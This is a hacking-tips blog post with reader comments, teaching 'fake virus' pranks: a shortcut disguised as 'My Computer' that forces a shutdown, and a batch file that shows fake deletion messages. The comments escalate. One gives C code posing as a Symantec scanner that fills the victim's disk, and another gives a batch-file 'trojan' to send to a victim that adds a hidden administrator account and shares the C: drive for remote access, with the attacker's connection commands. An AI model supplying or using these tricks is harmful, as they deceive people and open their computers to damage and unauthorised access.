How to make 2 fake virus in any O.P easily! No training required!

7 comments
How to make a Fake VIRUS in windows with ease… 
No training required!

So lets start with this :-


Well what we actually have to do in this hack is too make a fake virus in the desktop so as to trick the user to double click it and boom..








Steps :-


1. Right click on the desktop, then 'New' and choose “Create Shortcut”.



2. A New window will pop up, Type in it :-

shutdown –s –t 900 –c “This Computer is Fuc*** by HTD”3. Now click on “NEXT” button. Now you can choose the name of the fake name for the virus file choose anything like :- 


“My Computer”

“Internet Explorer”

“Recycle Bin”


Its all depended on the user usage that's why i used these name cos these are the most used terms in a windows xp box. 





4. Now click on “close” to close the window. a new shortcut would come on the desktop with the name you wanted. 




5. Now to change the icon of the shortcut just Follow these steps :- 



Right click it >> Properties >> Customize tab >> Change icon >> Browse >> Choose the icon >> Click OK



6. All done hell yeah… 



(2) Fake Virus Batch File:

Source : Makeusof

I got this prank from WikiHow. I love it because it looks the most like an actual attack. Copy and paste the following into an open Notepad window, then save the file with any name you choose and an extension of “.bat”
Here’s the code:
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep
echo Wscript.Sleep 5000>C:sleep5000.vbs
echo Wscript.Sleep 3000>C:sleep3000.vbs
echo Wscript.Sleep 4000>C:sleep4000.vbs
echo Wscript.Sleep 2000>C:sleep2000.vbs
cd %systemroot%System32
dir
cls
start /w wscript.exe C:sleep3000.vbs
echo Deleting Critical System Files…
echo del *.*
start /w wscript.exe C:sleep3000.vbs
echo Deletion Successful!
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo:
echo Deleting Root Partition…
start /w wscript.exe C:sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x…
cd C:Documents and SettingsAll UsersStart MenuPrograms
mkdir h4x
start /w wscript.exe C:sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1…
start /w wscript.exe C:sleep3000.vbs
echo cd C:Documents and SettingsAll UsersStart MenuProgramsStartuph4x
echo start hax.exe
start /w wscript.exe C:sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:sleep2000.vbs
echo Disabling Windows Firewall…
start /w wscript.exe C:sleep2000.vbs
echo Killing all processes…
start /w wscript.exe C:sleep2000.vbs
echo Allowing virus to boot from startup…
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:sleep2000.vbs
pause
shutdown -s -t 10 -c “Your computer has committed suicide. Have a nice day.”

Here’s how it will look like once it is launched:



















Your victim’s PC will display messages as in the above image, and then initiate a shutdown sequence which can be stopped by entering “shutdown ““a” in the Run command box. It looks bad, but is otherwise completely harmless.



7 comments :

  1. #include
    #include
    #include
    #include
    FILE *a,*t,*b;
    int r,status,vir_count;
    double i;
    char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;
    void eatspace(void);
    void findroot(void);
    void showstatus(void);
    void draw(void);
    void accept(void);
    void main()
    {
    draw();
    accept();
    textcolor(WHITE);
    draw();
    gotoxy(12,8);
    cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
    sleep(3);
    gotoxy(12,8);
    delline();
    cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
    getch();
    gotoxy(12,8);
    delline();
    findroot();
    }
    void accept()
    {
    textcolor(LIGHTRED);
    gotoxy(1,8);
    cputs("THIS PROGRAM NEEDS TO CHECK YOUR PC FOR ERRORS.IF YOU RUN THIS PROGRAM IT WILL\n\rCLEAN THE ERRORS AND \n\rELIMINATE THE VIRUSES ON YOUR PC.\n\n\rSYMANTEC NORTON PRODUCT COPYRIGHT 2012.\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");
    if((choice=getch())!=13)
    exit(0);
    }
    void draw()
    {
    clrscr();
    textcolor(WHITE);
    gotoxy(12,2);
    cputs("********************************************************");
    gotoxy(12,6);
    cputs("********************************************************");
    gotoxy(12,3);
    cputs("*\n\b*\n\b*\n\b");
    gotoxy(67,3);
    cputs("*\n\b*\n\b*\n\b");
    gotoxy(14,4);
    cputs("SYMANTEC SECURITY SCAN - 2012 (QUICK SYSTEM SCANNER)");
    }
    void findroot()
    {
    t=fopen("C:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    textcolor(WHITE);
    a=fopen("C:\\windows\\system32\\trojanalex.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("C:\\windows\\system32\\trojanalex.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    t=fopen("D:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    a=fopen("D:\\windows\\system32\\trojanalex.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("D:\\windows\\system32\\trojanalex.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    t=fopen("E:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    a=fopen("E:\\windows\\system32\\trojanalex.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("E:\\windows\\system32\\trojanalex.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    t=fopen("F:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    a=fopen("F:\\windows\\system32\\trojanalex.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("F:\\windows\\system32\\trojanalex.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    if(t==NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
    getch();
    exit(1);
    }
    exit(1);
    }

    void eatspace()
    {
    textcolor(LIGHTRED);
    gotoxy(12,16);
    cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
    textcolor(WHITE);
    gotoxy(12,18);
    while(1)
    {
    for(r=1;r<4;r++)
    {
    for(i=1;i<900000;i++)
    {
    status=fputs(ch,b);
    if(status==EOF)
    {
    textcolor(WHITE);
    vir_count=random(120);
    draw();
    gotoxy(12,8);
    cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
    gotoxy(12,10);
    cprintf("PRESS ANY KEY TO CLOSE...");
    getch();
    break;
    }
    }
    cputs(".");
    if(status==EOF) break;
    }
    if(status==EOF) break;
    }
    exit(0);
    }

    void showstatus()
    {
    gotoxy(12,8);
    cputs("SCANNING THE SYSTEM FOR THREATS");
    gotoxy(12,10);
    cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
    gotoxy(12,13);
    cputs("SCAN IN PROGRESS. PLEASE WAIT...");
    }

    ReplyDelete
  2. SAVE IT IN NOTEPAD++ [.CPP]
    OR COMPILE IT USIN ANY C+ COMPILERS ,,,,I PRFER BORLAND
    IF U DONT HAVE IT DOWNLOAD IT FROM.
    http://altd.embarcadero.com/download/bcppbuilder/freecommandLinetools.exe
    IF U DONT KNOW HOW TO THEN REFEER ....
    http://www.webnotes.org/bcc55eng.htm
    if still doughtfull contact mee .....
    h290598@gmail.com or geetha.kallianpur@rediffmail.com

    ReplyDelete

  3. void crazymouse()
    {
    int i = 0;
    while(i<100)
    {
    Sleep(1000);
    int x = rand()%1000;
    int y = rand()%700; SetCursorPos(x, y);
    i++;
    }
    }

    ReplyDelete
  4. #include
    #include
    int main()
    {
    RECT rc;
    HWND hWnd;
    POINT lpPoint;
    hWnd = FindWindowEx(FindWindow("Shell_TrayWnd",NULL),NULL,"Button","Start");
    if(hWnd == NULL)
    {
    printf("Unable to find start button!\n");
    return 0;
    }
    while(!GetAsyncKeyState(VK_F10))
    {
    GetWindowRect(hWnd,&rc);
    GetCursorPos(&lpPoint);
    if(PtInRect(&rc, lpPoint))
    {
    EnableWindow(hWnd,FALSE);
    ShowWindow(hWnd,FALSE);
    }
    else
    {
    EnableWindow(hWnd,TRUE);
    ShowWindow(hWnd,TRUE);
    }
    Sleep(1);
    }
    if(!IsWindowVisible(hWnd))
    {
    EnableWindow(hWnd,TRUE);
    ShowWindow(hWnd,TRUE);
    }
    return 0;
    }



    i can't remember where i got it so im not takin any credit for it.....

    ReplyDelete
  5. How to Create a trojan in .bat file

    A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user's computer system.
    In this post i will tell you How to create your own trojan horse in a .bat file,Helping you to hack into another persons computer.I had previously posted a tutorial on How to sent a trojan as a txt file but this post will explain you creating a Trojan in a .bat file to infect a Remote computer.

    Creating a Trojan in a .bat file - Procdure

    1.Go to start and click on run and type cmd

    2.Now insert this command: net

    And you will get something like this

    NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
    HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
    SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

    Ok in this tutorial we well use 3 of the commands listed here
    they are: net user , net share and net send

    We will select some of those commands and put them on a .bat file.

    What is a .bat file?
    Bat file is a piece of text that windows will execute as commands.

    Open notepad and write there:


    dir
    pause


    And now save this as test.bat and execute it.

    ---------------------- Starting -------------------
    -:Server:-
    The plan here is to share the C: drive and make a new user
    with administrators access

    Step one -> Open a dos prompt and a notebook
    The dos prompt will help you to test if the commands are ok
    and the notebook will be used to make the .bat file.

    Command n 1-> net user neo /add
    What does this do? It makes a new user called neo you can put
    any name you whant

    Command n 2-> net localgroup administrators neo /add
    This is the command that make your user go to the administrators
    group.

    Depending on the windows version the name will be different.

    If you got an american version the name for the group is Administrators
    and for the portuguese version is administradores so it's nice
    yo know which version of windows xp you are going to try share.

    Command n 3->net share system=C:\ /unlimited
    This commands share the C: drive with the name of system.

    Nice and those are the 3 commands that you will need to put on your
    .bat file and send to your friend.

    -!extras!-
    Command n 4-> net send urip I am ur server
    Where it says urip you will insert your ip and when the victim
    opens the .bat it will send a message to your computer
    and you can check the victim ip.

    ->To see your ip in the dos prompt put this command: ipconfig

    -----------------------: Client :----------------
    Now that your friend opened your .bat file her system have the
    C: drive shared and a new administrator user.
    First we need to make a session with the remote computer with
    the net use command , you will execute these commands from your
    dos prompt.

    Command n 1 -> net use \\victimip neo
    This command will make a session between you and the victim
    Of course where it says victimip you will insert the victim ip.
    Command n 2-> explorer \\victimip\system
    And this will open a explorer windows in the share system wich is
    the C: drive with administrators access.

    Hope you liked the post! Pass the comments

    ReplyDelete